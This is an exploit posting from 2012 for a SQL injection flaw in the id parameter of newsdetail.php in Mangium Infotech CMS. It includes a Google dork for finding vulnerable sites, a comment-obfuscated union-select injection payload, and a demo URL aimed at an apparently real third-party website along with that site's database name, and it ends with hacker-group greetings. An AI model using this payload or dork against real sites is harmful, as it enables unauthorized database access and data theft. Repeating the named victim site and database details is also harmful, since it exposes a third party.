<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
-->
# Exploit Title: Mangium Infotech cms Sql Injection Vulnerability
#
# Google Dork: Intext:" Powered by Mangium Infotech"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.mangium.com/
#
# Tested on: all
#
==================================
[+] id parametr in newsdetail.php is Vulnerable to sql injection
[+]
target/newsdetail.php?id=[id][+/*!union*/+/*!select*/+1,2,3,4,5,6--]
D3m0:
http://www.trishulblr.com/newsdetail.php?id=7+order+by+7--
DB_NAME : nmittal_tridatabase
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369